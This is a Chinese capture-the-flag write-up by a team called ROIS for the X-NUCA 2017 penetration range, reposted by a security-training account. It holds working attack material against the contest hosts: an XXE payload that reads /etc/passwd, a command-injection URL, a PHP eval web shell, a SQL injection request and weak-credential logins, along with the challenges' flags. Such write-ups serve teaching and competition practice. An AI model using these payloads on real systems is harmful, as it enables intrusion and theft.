点击“合天智汇”关注,学习网安干货
靶场渗透赛
No.1 你喜欢颜文字么| Solved
No.2 让你无语的 md5 | Solved
No.3 Pav1 和 lloowweerrxx.avi | Solved No.4 X-NUCA 2017's Secrets | Solved No.5 Lucky Number Calc | Solved No.6 Hello World | solved
No.8 看视频真嗨皮 | Solved
No.9 The Best Community | Solved
No.11 两只小蜜蜂啊| Solved
No.14 DuomiCMS | Solved
No.16 来一发 flask | Solved
No.18 AContent | Solved: No.21 Freecms | Solved
No.23 找入口 | Solved
No.24 可爱的星星 | Solved
No.25 | Solved
No.1 你喜欢颜文字么| Solved
不知所云的题目
No.2 让你无语的 md5 | Solved
关键字词:一档 CTF 题
Pav1 遇到不会的 md5 很喜欢去百度一下无语的 md5 e5a5dc7404c4e4dad32e4556ac2588b6.xnuca.cn 根据注释提示是 mysql 的字符集问题
猜测都是 admin 的账户 查询 admin
根据 https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html
查询 admin%c2
16714f297ee17b13a097a15cd229c947 这个 MD5 有点不同啊,快去 somd5 一下 在 https://somd5.com/查询下得到 flag
xnuca{0c7b5781935082833f6487a69d81404b}
No.3 Pav1 和 lloowweerrxx.avi | Solved
CVE-2016-1897
NO.4 X-NUCA 2017's Secrets | Solved
/res/site.war 下载源码 zip 解压 jd-gui 看 class 注册的时候加一个 isActive=1 就能登录
然后现在是要让 isSupaAdministrata=1
参考 http://blog.csdn.net/qq_27446553/article/details/73480823 对象自动绑定 拿到
http://a4b359466421ae3aa76a8b116dda3870.xnuca.cn/res/HYGorlL29LtcMCR6GUg23XRM JxVge5F7.js
(function() { alert('xnuca{hbeLMqNuCnohaWTQhxpf5Ep7yMBjcjG3}')
})
No.5 Lucky Number Calc | Solved
xml 注入
POST /ctf1.php HTTP/1.1
Host: f83f119af64fa2b94c37231bbce09678.xnuca.cn Content-Length: 174
Accept: */*
Origin: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 DNT: 1
Referer: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn/ Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Connection: close
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/passwd"
>
]>
<user>
<name>&harmless;</name>
</user>
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false ntp:x:103:109::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ctf1.php
<?php
$xmldata=file_get_contents("php://input");
#$data=simplexml_load_string($xmldata);
libxml_disable_entity_loader(false);
$dom = new DOMDocument();
$dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);
$data = simplexml_import_dom($dom);
$str = $data->name;
if(preg_match("/[\'.,:;*?~`!@#$%^&)(<>{}]|\]|\[|\/|\\\|\"|\|/",$str)){ echo 'Illegal Input';
}else{
$firstnum = ord(substr( $str, 0, 1 ));
$stlen = strlen($str);
$luckynum = ($firstnum * $stlen) % 100;
$res = 'Dear '.$str.', Your Lucky Number is '.$luckynum; echo $res;
}
?>
读取 /etc/hosts
xnuca{N3sSMD165KesSXlyOgwMGTepI2HTJC0b}
No.6 Hello World | solved
http://91101217df5a534c58f8b0e0922e1161.xnuca.cn/.git/config
用工具 dump 下来一个 js 一个 php
js 里密文解出来是 flag is in flag.js
php: discuz 的核心加密解密函数
flag.php
<?php
ini_set("display_errors", "Off"); error_reporting(0);
function encode($b, $c = '', $d = 0) {
$e = 4;
$c = md5($c); //"816302c22ad445a2cb9b7d0a209f2854"
$f = md5(substr($c, 0, 16)); // "832d748a3cad1935ab1d9d18182e9ec9"
$g = md5(substr($c, 16, 16)); // "ac4f2b390bc5f79a1f987ac15cb7f36d"
$h = $e ? ($k == 'DECODE' ? substr($b, 0, $e) : substr(md5(microtime()) , -$e)) : ''; // 3133
$l = $f . md5($f . $h); // "832d748a3cad1935ab1d9d18182e9ec99a6a04e6f4386d374d5e38fcb24f1c9f"
$m = strlen($l); // 64
$b = sprintf('%010d', $d ? $d + time() : 0) . substr(md5($b . $g) , 0, 16) . $b;
$n = strlen($b);
$o = '';
$p = range(0, 255);
$q = array();
for ($r = 0; $r <= 255; $r++) {
$q[$r] = ord($l[$r % $m]);
}
for ($s = $r = 0; $r < 256; $r++) {
$s = ($s + $p[$r] + $q[$r]) % 256;
$t = $p[$r];
$p[$r] = $p[$s];
$p[$s] = $t;
}
for ($u = $s = $r = 0; $r < $n; $r++) {
$u = ($u + 1) % 256;
$s = ($s + $p[$u]) % 256;
$t = $p[$u];
$p[$u] = $p[$s];
$p[$s] = $t;
$o.= chr(ord($b[$r]) ^ ($p[($p[$u] + $p[$s]) % 256]));
}
return $h . str_replace('=', '', base64_encode($o));
}
$c = "flag_1s_n0t_h3re";
$cipher = "3133g8JTV89Ds4oh5k0JRPFijAbc1Qw7HciaZfhsV5lWr+7RM9IAF9SNw9WJMEg";
?>
解出来还是 flag is in flag.js, 这都没卵用
https://gist.github.com/angusty/bcbb64fb6dc47b26674a
手工 dump .git/objects
git cat-file -p f2b45f1e5af6dc1a8607c11e4ddc5fd077276c45 > 1.js git cat-file -p 04bb09bb63fe48e6cab3e1c72a7ef51dda9634b8 > 2.js diff 两个文件
flag{82efc37f1cd5d4636ea7cadcd5a814a2}
No.8 看视频真嗨皮 | Solved
bd314808c1ed529fdba936fdffc5c7ba.xnuca.cn
参考 http://www.bugku.com/thread-28-1-1.html
No.9 The Best Community|Solved
http://a8cb8b3cde7837fb14512b1055e4a275.xnuca.cn
https://www.exploit-db.com/exploits/40756/
No.11 两只小蜜蜂啊| Solved
http://00aa852a37a43db58ac318f0deaef536.xnuca.cn
请在目标入口/writeHere/目录下创建名为 20778565df0d421b539bf4e66fe21738 的文件
https://bbs.ichunqiu.com/thread-12635-1-1.html
http://00aa852a37a43db58ac318f0deaef536.xnuca.cn/admin/login.php 注入?
账号: admin 密码: amdin
/upload/img/201708261723177106.php?a=eval($_POST[q]);
No.14 DuomiCMS | Solved
http://d832106f99c258d75bb16d1873e6c77b.xnuca.cn/ http://3b65cbfdc649746ca312ea65e6e1df95.xnuca.cn/search.php?jq=1);system(dir);//&searchtype=5
命令执行
参考 http://www.lofter.com/tag/duomicms
No.16 来一发 flask | Solved
2bf75b750bb0799fd95dad8ac92f1cb8.xnuca.cn 404 页面服务端模板注入
直接执行代码
No.18 AContent | Solved:
参考 https://www.htbridge.com/advisory/HTB23117 xnuca{Co8n0g5r72a4tul3at2ions!Y0ug0tMe}
No.21 Freecms | Solved
S2-045 工具来一发
No.23 找入口 | Solved
5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn http://07945fd84fe47a1a2264eb539fed1c1b.xnuca.cn/?/admin
弱密码 admin admin
任意上传个小马
/etc/flag.txt
No.24 可爱的星星 | Solved
5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn
POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Cookie: PHPSESSID=65676uue8hmaigepggn66pn1l6
Host: 522e52f9f4f81b75b2718ad29ac60c14.xnuca.cn Connection: close
User-Agent: Paw/3.1.2 (Macintosh; OS X/10.12.6) GCDHTTPRequest Content-Length: 112
title=aa&email_s=a&email_m=a&type=a&users=aaaa%27%7Caaa&role%5B%5D=abdc%7D%27+union+select+ 1%2Cuser%28%29%2C3%23
注入得到 admin 密码 1234!@#$ 登录之后上传图片,文件管理中重命名为.php
No.25 | Solved
metinfo 5.3.1 d231646c5c0e4ac216204b5d166e0c56.xnuca.cn
metinfo 参考 https
本文来自:ROIS团队!
别忘了投稿哟!!!
合天公众号开启原创投稿啦!!!
大家有好的技术原创文章。
欢迎投稿至邮箱:edu@heetian.com;
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。
有才能的你快来投稿吧!
合天网安实验室
网址 : www.hetianlab.com
电话:4006-123-731
长按图片,据说只有颜值高的人才能识别哦→
这里“阅读原文”,查看ROIS团队独家专访